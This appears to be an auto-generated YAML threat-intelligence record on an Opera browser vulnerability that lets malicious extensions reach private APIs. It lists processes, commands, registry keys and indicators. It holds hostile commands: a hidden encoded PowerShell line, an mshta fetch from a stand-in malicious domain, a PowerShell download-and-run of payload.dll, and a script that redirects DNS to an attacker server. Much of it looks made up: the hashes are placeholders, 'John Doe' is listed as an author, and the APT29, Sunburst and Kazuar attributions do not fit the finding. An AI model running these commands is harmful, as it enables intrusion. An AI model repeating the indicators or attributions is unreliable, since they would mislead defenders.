description: Guardio Labs discovered a vulnerability in Opera browser allowing malicious
  extensions to access permissive Private APIs, enabling actions like screen capturing
  and account hijacking.
TTPs:
  processes:
  - chrome.exe
  - opera.exe
  - powershell.exe
  - svchost.exe
  - mshta.exe
  commandline:
  - '"C:\Program Files\Opera\launcher.exe" --no-sandbox --disable-background-networking
    --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor
    --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost
    --enable-automation --password-store=basic --use-mock-keychain --no-first-run
    --flag-switches-begin --disable-background-timer-throttling --disable-backgrounding-occluded-windows
    --disable-breakpad --disable-client-side-phishing-detection --disable-default-apps
    --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking
    --disable-prompt-on-repost --enable-automation --password-store=basic --use-mock-keychain
    --no-first-run --flag-switches-end'
  - powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc <encoded_command>
  - mshta.exe http://maliciousdomain.com/script.hta
  powershell:
  - let script = document.createElement("script");script.src = chrome.runtime.getURL("injected.js");(document.head
    || document.documentElement).appendChild(script);
  - '$script = New-Object System.Net.WebClient

    $script.DownloadFile(''http://maliciousdomain.com/payload.dll'', ''C:\Windows\Temp\payload.dll'')

    Start-Process ''C:\Windows\Temp\payload.dll''

    '
  scripting_engine:
  - 'window.onload = function() {if (window.location.hostname === ''opera.com'') {console.log(''We
    run on a permissive domain!'');chrome.settingsPrivate.setPref(''{\"dns_over_https.mode\":
    \"secure\",\"dns_over_https.templates\": \"https://bad.dnsserver.xyz\"}'')} else
    {console.log(''We are not running on a relevant domain...'');};'
  registry_keys:
  - HKEY_LOCAL_MACHINE\SOFTWARE\Opera Software\Opera Stable
  - HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Malware
  image_load:
  - chrome.dll
  - opera.dll
  - svchost.exe -> C:\Windows\System32\payload.dll
  network_connections:
  - process: chrome.exe
    destination: crypto-corner.op-test.net
    port: 443
  - process: opera.exe
    destination: bad.dnsserver.xyz
    port: 80
  - powershell.exe -> http://maliciousdomain.com/payload.dll:80
  - mshta.exe -> http://maliciousdomain.com/script.hta:80
  file_activity:
  - C:\Users\<User>\AppData\Local\Opera Software\Opera Stable\injected.js
  - C:\Users\<User>\AppData\Local\Google\Chrome\User Data\Default\Extensions\<ExtensionID>
  - C:\Windows\Temp\payload.dll
  - C:\Users\user\AppData\Local\Temp\tempfile.txt
  persistence:
  - HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Malware
  pipes: []
  process_relations:
  - chrome.exe -> injected.js
  - powershell.exe -> svchost.exe
IOCs:
  hashes:
  - 'SHA256: 1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef'
  - SHA256:1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef
  IPs:
  - bad.dnsserver.xyz
  - 192.168.1.1
  domains:
  - crypto-corner.op-test.net
  - opera.com
  - maliciousdomain.com
  URLs:
  - http://maliciousdomain.com/payload.dll
  - http://maliciousdomain.com/script.hta
authors:
- Guardio Labs
- John Doe
attribution:
- APT29
malware_families:
- Sunburst
- Kazuar
reference: https://guard.io/labs/crossbarking-exploiting-a-0-day-opera-vulnerability-with-a-cross-browser-extension-store-attack
date_of_publication: July 28, 2025
file_creation_date: July 28, 2025
